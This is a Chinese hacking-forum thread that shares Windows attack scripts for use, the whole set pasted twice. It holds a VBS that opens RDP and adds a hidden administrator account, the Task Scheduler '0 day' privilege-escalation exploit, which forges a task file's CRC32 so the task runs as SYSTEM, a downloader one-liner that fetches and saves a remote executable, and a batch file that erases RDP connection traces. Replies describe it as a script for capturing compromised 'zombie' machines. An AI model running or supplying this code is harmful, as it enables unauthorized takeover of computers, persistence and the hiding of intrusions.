不要倒一篮子代码,论坛不是垃圾桶。这是个用0-day拿肉鸡的脚本,应该作为文件传上来。
79337
%7B%22isLastPage%22%3Atrue%2C%22notes%22%3A%5B%5D%2C%22pid%22%3A%22t79337%22%2C%22tid%22%3A%2279337%22%2C%22mainForumsId%22%3A%5B%22134%22%5D%2C%22categoriesId%22%3A%5B%5D%2C%22tcId%22%3A%5B%5D%7D
%7B%22isEditMode%22%3Afalse%7D
一些vbs或者是bat的小程序代码
我知道这里会渗透的绝对不止我一个。。。
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = XXXXXXXXXXdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
XXXXXXXeateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
XXXXXXXeateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
XXXXXXXtDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
XXXXXXXtDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
XXXXXXXtDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If XXXXXXXXXXXXXXXXXXXXunt Then:username=XXXXXXXXXXguments(0):password=XXXXXXXXXXguments(1):Else:username="$DavieHacker":password="DavieSuper":end if:set wsnetwork=CreateObject("XXXXXXXXXXTWORK"):os="WinNT://"&XXXXXXXXXXXXXputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=XXXXXeate("user",username):XXXXXtPassword password:XXXXXtInfo:Set of=GetObject(os&"/"&username&",user"):XXXXXd(XXXXXsPath)'XXXXXXXXXXho XXXXXsPath
(以上是vbs提权代码,功能是建立一个超级管理员用户并且开启3389端口)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<job id="tasksch-wD-0day">
<script language="Javascript">
crc_table = new Array(
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,
0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,
0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,
0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,
0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,
0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,
0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,
0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,
0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,
0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,
0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,
0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,
0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,
0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,
0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,
0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,
0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,
0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,
0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,
0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,
0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,
0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,
0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,
0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,
0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,
0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,
0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,
0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,
0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,
0x2D02EF8D
);
var hD='0123456789ABCDEF';
function dec2hex(d) {
h='';
for (i=0;i<8;i++) {
h = XXXXXarAt(d&15)+h;
d >>>= 4;
}
return h;
}
function encodeToHex(str){
var r="";
var e=str.length;
var c=0;
var h;
while(c<e){
h=XXXXXXarCodeAt(c++).toString(16);
while(h.length<3) h="0"+h;
r+=h;
}
return r;
}
function decodeFromHex(str){
var r="";
var e=str.length;
var s=0;
while(e>1){
r=r+XXXXXXXXXomCharCode("0x"+str.substring(s,s+2));
s=s+2;
e=e-2;
}
return r;
}
function calc_crc(anyForm) {
anyTextString=decodeFromHex(anyForm);
Crc_value = 0xFFFFFFFF;
StringLength=anyTextString.length;
for (i=0; i<StringLength; i++) {
tableIndex = (XXXXXXXXXXXXXXXXarCodeAt(i) ^ Crc_value) & 0xFF;
Table_value = crc_table[tableIndex];
Crc_value >>>= 8;
Crc_value ^= Table_value;
}
Crc_value ^= 0xFFFFFFFF;
return dec2hex(Crc_value);
}
function rev_crc(leadString,endString,crc32) {
//
// First, we calculate the CRC-32 for the initial string
//
anyTextString=decodeFromHex(leadString);
Crc_value = 0xFFFFFFFF;
StringLength=anyTextString.length;
//document.write(alert(StringLength));
for (var i=0; i<StringLength; i++) {
tableIndex = (XXXXXXXXXXXXXXXXarCodeAt(i) ^ Crc_value) & 0xFF;
Table_value = crc_table[tableIndex];
Crc_value >>>= 8;
Crc_value ^= Table_value;
}
//
// Second, we calculate the CRC-32 without the final string
//
crc=parseInt(crc32,16);
crc ^= 0xFFFFFFFF;
anyTextString=decodeFromHex(endString);
StringLength=anyTextString.length;
for (var i=0; i<StringLength; i++) {
tableIndex=0;
Table_value = crc_table[tableIndex];
while (((Table_value ^ crc) >>> 24) & 0xFF) {
tableIndex++;
Table_value = crc_table[tableIndex];
}
crc ^= Table_value;
crc <<= 8;
crc |= tableIndex ^ XXXXXXXXXXXXXXXXarCodeAt(StringLength - i -1);
}
//
// Now let's find the 4-byte string
//
for (var i=0; i<4; i++) {
tableIndex=0;
Table_value = crc_table[tableIndex];
while (((Table_value ^ crc) >>> 24) & 0xFF) {
tableIndex++;
Table_value = crc_table[tableIndex];
}
crc ^= Table_value;
crc <<= 8;
crc |= tableIndex;
}
crc ^= Crc_value;
//
// Finally, display the results
//
var TextString=dec2hex(crc);
var Teststring='';
Teststring=TextString.substring(6,8);
Teststring+=TextString.substring(4,6);
Teststring+=TextString.substring(2,4);
Teststring+=TextString.substring(0,2);
return Teststring
}
function decodeFromHex(str){
var r="";
var e=str.length;
var s=0;
while(e>1){
r=r+XXXXXXXXXomCharCode("0x"+str.substring(s,s+2));
s=s+2;
e=e-2;
}
return r;
}
</script>
<script language="VBScript">
dim output
set output = XXXXXXXXXXdout
output.writeline " Task Scheduler 0 day - Privilege Escalation "
output.writeline " Should work on Vista/Win7/2008 x86/x64"
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
biatchFile = XXXXXXXXXXeateObject("XXXXXXXXXXXXleSystemObject").GetSpecialFolder(2)+"\XXXXXXt"
Set objShell = CreateObject("XXXXXXXXXXell")
XXXXXXXXXXXn "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True
Set fso = CreateObject("XXXXXXXXXXXXleSystemObject")
Set a = XXXXXXeateTextFile(biatchFile, True)
a.WriteLine ("net user /add test123 test123")
a.WriteLine ("net localgroup administrators /add test123")
a.WriteLine ("schtasks /delete /f /TN wDw00t")
Function ReadByteArray(strFileName)
Const adTypeBinary = 1
Dim bin
Set bin = CreateObject("XXXXXXXXream")
bin.Type = adTypeBinary
bin.Open
bin.LoadFromFile strFileName
ReadByteArray = XXXXXXad
'output.writeline ReadByteArray
End Function
Function OctetToHexStr (arrbytOctet)
Dim k
OctetToHexStr = ""
For k = 3 To Lenb (arrbytOctet)
OctetToHexStr = OctetToHexStr _
& Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
Next
End Function
strFileName="C:\windows\system32\tasks\wDw00t"
hexXML = OctetToHexStr (ReadByteArray(strFileName))
'output.writeline hexXML
crc32 = calc_crc(hexXML)
output.writeline "Crc32 original: "+crc32
Set xmlDoc = CreateObject("Microsoft.XMLDOM")
'permissions workaround
'XXXXXXXXXXXn "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
'XXXXXXXXXXXn "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
Set objShell = XXXXXXXXXXeateObject("XXXXXXXXXXell")
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")
Do Until XXXXXXXXXXXXXXXXXXXXXXXEndOfStream
strLine = strLine & XXXXXXXXXXXXXXXXXXXXXXXadLine()
Loop
hexXML = "FFFE3C00"+OctetToHexStr(strLine)
'output.writeline hexXML
Set ts = XXXXXXeatetextfile ("wDw00t.xml")
For n = 1 To (Len (hexXML) - 1) step 2
ts.write Chr ("&h" & Mid (hexXML, n, 2))
Next
XXXXXose
xmlDoc.load "wDw00t.xml"
Set Author = XXXXXXXXXlectsinglenode ("//Task/RegistrationInfo/Author")
Author.text = "LocalSystem"
Set UserId = XXXXXXXXXlectsinglenode ("//Task/Principals/Principal/UserId")
UserId.text = "S-1-5-18"
XXXXXXXXXve(strFileName)
hexXML = OctetToHexStr (ReadByteArray(strFileName))
leadString=hexXML+"3C0021002D002D00"
endString="2D002D003E00"
'output.writeline leadString
impbytes=rev_crc(leadString,endString,crc32)
output.writeline "Crc32 Magic Bytes: "+impbytes
finalString = leadString+impbytes+endString
forge = calc_crc(finalString)
output.writeline "Crc32 Forged: "+forge
strHexString="FFFE"+finalString
Set fso = CreateObject ("XXXXXXXXXXXXlesystemobject")
Set stream = CreateObject ("XXXXXXXXream")
Set ts = XXXXXXeatetextfile (strFileName)
For n = 1 To (Len (strHexString) - 1) step 2
ts.write Chr ("&h" & Mid (strHexString, n, 2))
Next
XXXXXose
Set objShell = CreateObject("XXXXXXXXXXell")
XXXXXXXXXXXn "schtasks /change /TN wDw00t /disable",,True
XXXXXXXXXXXn "schtasks /change /TN wDw00t /enable",,True
XXXXXXXXXXXn "schtasks /run /TN wDw00t",,True
</script>
</job>
(Windows7-Windows2008提权exp-taskxpl 功能过于和谐,暂不介绍)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"XXXXXXXXXXXXXXXXXXXXXt/yueyan.exe^",0:XXXXXXXXnd():Set sGet = CreateObject(^"XXXXXXXXream^"):XXXXXXXde = 3:sGet.Type = 1:sGet.Open():sGet.Write(XXXXXXXXsponseBody):XXXXXXXveToFile ^"C:\yueyan.exe^",2 >down.vbs
(这是一个有着下载者功能的vbs代码)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
@echo off
color 0A
title 3389连接痕迹清除 蛋清@F4ckTeam
mode con cols=88 lines=20
set /p fk= 确定要清空3389连接痕迹吗?(y/n)
if /i "%fk%"=="y" goto y
if /i "%fk%"=="n" goto n
call %0
:y
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client" /f
del /a /f /q %HOMEPATH%\Documents\Default.rdp
echo 命令执行成功,请手动查看是否清除。
pause >nul
:n
exit
(这是一段能够清除连接痕迹的代码,非常实用)
不知道这些内容会不会被和谐
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = XXXXXXXXXXdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
XXXXXXXeateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
XXXXXXXeateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
XXXXXXXtDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
XXXXXXXtDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
XXXXXXXtDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If XXXXXXXXXXXXXXXXXXXXunt Then:username=XXXXXXXXXXguments(0):password=XXXXXXXXXXguments(1):Else:username="$DavieHacker":password="DavieSuper":end if:set wsnetwork=CreateObject("XXXXXXXXXXTWORK"):os="WinNT://"&XXXXXXXXXXXXXputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=XXXXXeate("user",username):XXXXXtPassword password:XXXXXtInfo:Set of=GetObject(os&"/"&username&",user"):XXXXXd(XXXXXsPath)'XXXXXXXXXXho XXXXXsPath
(以上是vbs提权代码,功能是建立一个超级管理员用户并且开启3389端口)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<job id="tasksch-wD-0day">
<script language="Javascript">
crc_table = new Array(
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,
0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,
0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,
0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,
0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,
0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,
0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,
0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,
0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,
0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,
0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,
0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,
0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,
0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,
0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,
0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,
0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,
0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,
0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,
0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,
0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,
0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,
0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,
0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,
0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,
0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,
0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,
0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,
0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,
0x2D02EF8D
);
var hD='0123456789ABCDEF';
function dec2hex(d) {
h='';
for (i=0;i<8;i++) {
h = XXXXXarAt(d&15)+h;
d >>>= 4;
}
return h;
}
function encodeToHex(str){
var r="";
var e=str.length;
var c=0;
var h;
while(c<e){
h=XXXXXXarCodeAt(c++).toString(16);
while(h.length<3) h="0"+h;
r+=h;
}
return r;
}
function decodeFromHex(str){
var r="";
var e=str.length;
var s=0;
while(e>1){
r=r+XXXXXXXXXomCharCode("0x"+str.substring(s,s+2));
s=s+2;
e=e-2;
}
return r;
}
function calc_crc(anyForm) {
anyTextString=decodeFromHex(anyForm);
Crc_value = 0xFFFFFFFF;
StringLength=anyTextString.length;
for (i=0; i<StringLength; i++) {
tableIndex = (XXXXXXXXXXXXXXXXarCodeAt(i) ^ Crc_value) & 0xFF;
Table_value = crc_table[tableIndex];
Crc_value >>>= 8;
Crc_value ^= Table_value;
}
Crc_value ^= 0xFFFFFFFF;
return dec2hex(Crc_value);
}
function rev_crc(leadString,endString,crc32) {
//
// First, we calculate the CRC-32 for the initial string
//
anyTextString=decodeFromHex(leadString);
Crc_value = 0xFFFFFFFF;
StringLength=anyTextString.length;
//document.write(alert(StringLength));
for (var i=0; i<StringLength; i++) {
tableIndex = (XXXXXXXXXXXXXXXXarCodeAt(i) ^ Crc_value) & 0xFF;
Table_value = crc_table[tableIndex];
Crc_value >>>= 8;
Crc_value ^= Table_value;
}
//
// Second, we calculate the CRC-32 without the final string
//
crc=parseInt(crc32,16);
crc ^= 0xFFFFFFFF;
anyTextString=decodeFromHex(endString);
StringLength=anyTextString.length;
for (var i=0; i<StringLength; i++) {
tableIndex=0;
Table_value = crc_table[tableIndex];
while (((Table_value ^ crc) >>> 24) & 0xFF) {
tableIndex++;
Table_value = crc_table[tableIndex];
}
crc ^= Table_value;
crc <<= 8;
crc |= tableIndex ^ XXXXXXXXXXXXXXXXarCodeAt(StringLength - i -1);
}
//
// Now let's find the 4-byte string
//
for (var i=0; i<4; i++) {
tableIndex=0;
Table_value = crc_table[tableIndex];
while (((Table_value ^ crc) >>> 24) & 0xFF) {
tableIndex++;
Table_value = crc_table[tableIndex];
}
crc ^= Table_value;
crc <<= 8;
crc |= tableIndex;
}
crc ^= Crc_value;
//
// Finally, display the results
//
var TextString=dec2hex(crc);
var Teststring='';
Teststring=TextString.substring(6,8);
Teststring+=TextString.substring(4,6);
Teststring+=TextString.substring(2,4);
Teststring+=TextString.substring(0,2);
return Teststring
}
function decodeFromHex(str){
var r="";
var e=str.length;
var s=0;
while(e>1){
r=r+XXXXXXXXXomCharCode("0x"+str.substring(s,s+2));
s=s+2;
e=e-2;
}
return r;
}
</script>
<script language="VBScript">
dim output
set output = XXXXXXXXXXdout
output.writeline " Task Scheduler 0 day - Privilege Escalation "
output.writeline " Should work on Vista/Win7/2008 x86/x64"
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
biatchFile = XXXXXXXXXXeateObject("XXXXXXXXXXXXleSystemObject").GetSpecialFolder(2)+"\XXXXXXt"
Set objShell = CreateObject("XXXXXXXXXXell")
XXXXXXXXXXXn "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True
Set fso = CreateObject("XXXXXXXXXXXXleSystemObject")
Set a = XXXXXXeateTextFile(biatchFile, True)
a.WriteLine ("net user /add test123 test123")
a.WriteLine ("net localgroup administrators /add test123")
a.WriteLine ("schtasks /delete /f /TN wDw00t")
Function ReadByteArray(strFileName)
Const adTypeBinary = 1
Dim bin
Set bin = CreateObject("XXXXXXXXream")
bin.Type = adTypeBinary
bin.Open
bin.LoadFromFile strFileName
ReadByteArray = XXXXXXad
'output.writeline ReadByteArray
End Function
Function OctetToHexStr (arrbytOctet)
Dim k
OctetToHexStr = ""
For k = 3 To Lenb (arrbytOctet)
OctetToHexStr = OctetToHexStr _
& Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
Next
End Function
strFileName="C:\windows\system32\tasks\wDw00t"
hexXML = OctetToHexStr (ReadByteArray(strFileName))
'output.writeline hexXML
crc32 = calc_crc(hexXML)
output.writeline "Crc32 original: "+crc32
Set xmlDoc = CreateObject("Microsoft.XMLDOM")
'permissions workaround
'XXXXXXXXXXXn "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
'XXXXXXXXXXXn "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
Set objShell = XXXXXXXXXXeateObject("XXXXXXXXXXell")
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")
Do Until XXXXXXXXXXXXXXXXXXXXXXXEndOfStream
strLine = strLine & XXXXXXXXXXXXXXXXXXXXXXXadLine()
Loop
hexXML = "FFFE3C00"+OctetToHexStr(strLine)
'output.writeline hexXML
Set ts = XXXXXXeatetextfile ("wDw00t.xml")
For n = 1 To (Len (hexXML) - 1) step 2
ts.write Chr ("&h" & Mid (hexXML, n, 2))
Next
XXXXXose
xmlDoc.load "wDw00t.xml"
Set Author = XXXXXXXXXlectsinglenode ("//Task/RegistrationInfo/Author")
Author.text = "LocalSystem"
Set UserId = XXXXXXXXXlectsinglenode ("//Task/Principals/Principal/UserId")
UserId.text = "S-1-5-18"
XXXXXXXXXve(strFileName)
hexXML = OctetToHexStr (ReadByteArray(strFileName))
leadString=hexXML+"3C0021002D002D00"
endString="2D002D003E00"
'output.writeline leadString
impbytes=rev_crc(leadString,endString,crc32)
output.writeline "Crc32 Magic Bytes: "+impbytes
finalString = leadString+impbytes+endString
forge = calc_crc(finalString)
output.writeline "Crc32 Forged: "+forge
strHexString="FFFE"+finalString
Set fso = CreateObject ("XXXXXXXXXXXXlesystemobject")
Set stream = CreateObject ("XXXXXXXXream")
Set ts = XXXXXXeatetextfile (strFileName)
For n = 1 To (Len (strHexString) - 1) step 2
ts.write Chr ("&h" & Mid (strHexString, n, 2))
Next
XXXXXose
Set objShell = CreateObject("XXXXXXXXXXell")
XXXXXXXXXXXn "schtasks /change /TN wDw00t /disable",,True
XXXXXXXXXXXn "schtasks /change /TN wDw00t /enable",,True
XXXXXXXXXXXn "schtasks /run /TN wDw00t",,True
</script>
</job>
(Windows7-Windows2008提权exp-taskxpl 功能过于和谐,暂不介绍)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"XXXXXXXXXXXXXXXXXXXXXt/yueyan.exe^",0:XXXXXXXXnd():Set sGet = CreateObject(^"XXXXXXXXream^"):XXXXXXXde = 3:sGet.Type = 1:sGet.Open():sGet.Write(XXXXXXXXsponseBody):XXXXXXXveToFile ^"C:\yueyan.exe^",2 >down.vbs
(这是一个有着下载者功能的vbs代码)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
@echo off
color 0A
title 3389连接痕迹清除 蛋清@F4ckTeam
mode con cols=88 lines=20
set /p fk= 确定要清空3389连接痕迹吗?(y/n)
if /i "%fk%"=="y" goto y
if /i "%fk%"=="n" goto n
call %0
:y
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client" /f
del /a /f /q %HOMEPATH%\Documents\Default.rdp
echo 命令执行成功,请手动查看是否清除。
pause >nul
:n
exit
(这是一段能够清除连接痕迹的代码,非常实用)
不知道这些内容会不会被和谐
引用 novakon:谢谢建议,不过其实我也是怕有些小学生心理的人拿来害人,这些是提权脚本,抓鸡的话还得换过别的。。。
不要倒一篮子代码,论坛不是垃圾桶。这是个用0-day拿肉鸡的脚本,应该作为文件传上来。
引用
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
红盟大使
笔友
笔友
200字以内,仅用于支线交流,主线讨论请采用回复功能。